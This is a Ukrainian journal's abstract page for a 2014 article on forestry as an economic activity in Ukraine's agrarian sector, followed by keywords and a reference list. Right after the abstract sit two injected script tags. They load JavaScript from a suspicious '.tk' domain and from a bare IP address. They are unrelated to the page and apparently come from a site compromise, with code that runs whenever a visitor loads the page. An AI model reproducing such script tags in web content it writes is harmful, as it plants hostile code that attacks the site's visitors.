ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 502.2:630*9(477)
Економіка агропромислового виробництва

Лісівництво як вид економічної діяльності в галузі аграрного виробництва України / Бобко А. М. // Економіка АПК. - 2014. - № 7 - С. 67

Проведено дослідження звітності про використання землі в економічній діяльності українського лісівництва. Доведено, зокрема, нелогічне продовження його відокремлення, як було за часів колишнього СРСР, від аграрного сектору економіки. Наслідком останнього залишається невиправдано низький рівень вилучення деревини із лісових екосистем та виробництва лісових матеріалів за питомими показниками на одиницю виміру площі, у т. ч. порівняно із сусідніми європейським країнами. Також виявлено суттєві недолугості щодо обліку стану й використання лісових земель, економічної його ефективності. Окупність видатків Державного бюджету України останніми роками не перевищує 15%. Пропонується низка організаційно-технічних заходів, спрямованих на вдосконалення кількісного обліку землекористування, включаючи відображення об’єктів екологостабілізуючого призначення (полезахисні лісосмуги, захисні насадження та чагарники) у межах їх реального розміщення на сільськогосподарських угіддях. Табл.: 3. Рис.: 3. Бібліогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: землекористування, земства, економіка, екосистема, ліс, лісівництво, управління лісами

Список використаних джерел

 1. Бобко А. Нові шляхи підвищення інтенсифікації лісової економіки України / А.М. Бобко // Лісовий журнал. – 1994. – № 4. – С. 30–34.
 2. Земельний кодекс України від 25.10.2001 р. № 2768 25 жовтня 2001 року. Із змінами. / [Електронний ресурс] Режим доступу: // http://search.ligazakon.ua/l_doc2.nsf/link1/T012768.html.
 3. Інструкція з заповнення державної статистичної звітності з кількісного обліку земель // Державний комітет України по земельних ресурсах / [Електронний ресурс]. – Режим доступу // http://zakon2.rada.gov.ua/laws/show/z0788-98.
 4. Класифікація видів економічної діяльності – 2010. Чинний від 2012-01-01. (ДК 009:2010) / [Електронний ресурс]. – Режим доступу: // http://zakon.nau.ua/doc/?uid=1041.42130.0.
 5. Лесоводство. Термины и определения. ГОСТ 18486 – 87. Государственный стандарт Союза ССР [Електронний ресурс]. – Режим доступу: http://standartgost.ru/ГОСТ%2018486-87.
 6. Материалы для оценки земель Екатеринославской губернии // Оценочно-Статистическое Отделение Екатеринославского Губернского Земства. – Т. IV, часть I. Мариупольский уезд. – Екатеринослав. Типография Губернского Земства. 1904. – С. 114.
 7. Основы лесного законодательства Союза ССР и Союзных республик // Сборник нормативных материалов по лесному хозяйству. Составители: Л.Е. Михайлов, А.Б. Бронина. – М.: «Лесная промышленность», 1984. – С. 7.
 8. Патлай І.М. Інтродукція ялини звичайної у південній частині Лівобережного Лісостепу України / І.М. Патлай, С.І. Мусієнко // Наук. вісн. нац. аграр. ун-ту. Лісівництво, 17. – К., 1999. – С. 50–54.
 9. Про Земельну реформу. Постанова Верховної Ради Української РСР від 18 грудня 1990 р., № 563- Х-ХІІ. Із змінами / [Електронний ресурс]. – Режим доступу: // http://zakon1.rada.gov.ua/laws/show/563-12.
 10. Солтисік О.О. Моделювання динамічних економічних систем / О.О. Солтисік // Наук. вісн. Зб. наук.-техн. праць. Вип. 18.7 // Міністерство освіти і науки України. Науково-методичний центр вищої освіти. Національний лісотехнічний університет України. – Львів, 2008. – С. 214–218.
 11. Фурдичко О.І. Екологічні проблеми природокористування в науці і практиці лісогосподарського виробництва / О.І. Фурдичко // Вісн. НАН України. – 2012. – № 4. – С. 39–47.
 12. Фурдичко Орест. Землі України і проблеми обліку використання лісових земель і лісових екосистем / Орест Фурдичко, Андрій Бобко // Землевпорядний вісник. – 2012. – № 7. – С. 23–28.
 13. Фурдичко О.І. Землі лісові як об’єкт праці та екологічних спостережень у лісівництві / О.І. Фурдичко, А.М. Бобко // Вісник аграрної науки. – 2013. – № 7. – С. 60–64.
 14. Forest Resources of Europe, CIS, North America, Australia and New Zealand // United Nations Economic Commission for Europe. Timber Sections. – United Nations, New York and Geneva, 2000. – P. 194.
 15. Global Forest Resources Assessment. 2010. Main report // Food and Agriculture Organization of the United Nations. – p. 240. – Rome, 2010 / [Електронний ресурс]. – Режим доступу // http://www.fao.org/docrep/013/i1757e/i1757e.pdf.
 16. Standard Classification of Land use. UN-ECE (Geneva) [Електронний ресурс]. – Режим доступу: / http://www.unescap.org/stat/envstat/stwes-class-landuse.pdf.
Читати статтю: 14_07_67-75.pdf